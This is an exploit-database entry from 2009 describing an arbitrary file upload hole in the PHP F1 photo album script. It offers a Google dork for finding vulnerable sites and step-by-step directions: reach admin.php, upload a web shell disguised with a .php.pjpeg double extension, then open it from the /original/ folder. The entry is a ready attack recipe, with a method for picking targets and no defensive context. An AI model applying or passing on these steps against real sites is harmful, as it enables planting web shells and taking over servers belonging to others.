[] NeoSense

PHP F1 Upload - Arbitrary File Upload

Author: wlhaan hacker
type: webapps
platform: php
port: 
date_added: 2009-12-16 
date_updated:  
verified: 1 
codes: OSVDB-61156 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.commaxImageUpload.zip

PHP F1 Upload Shell Upload Vulnerability

name scripts:PHP F1

webscripts:http://www.phpf1.com

Created By  :wlhaan Hacker:

Email: iit@hotmail.com



google dork:

"Photo Album"  "Powered by PHP F1"

____________________________________

* How to use it ?

Go to : > http://server/path/admin.php

Upload You Shell:shell.php.pjpeg)

note:

change shell

shell.php.pjpeg

now go to shell

http://server/path/original/shell.php.pjpeg


end

www.sa-hacker.com/vb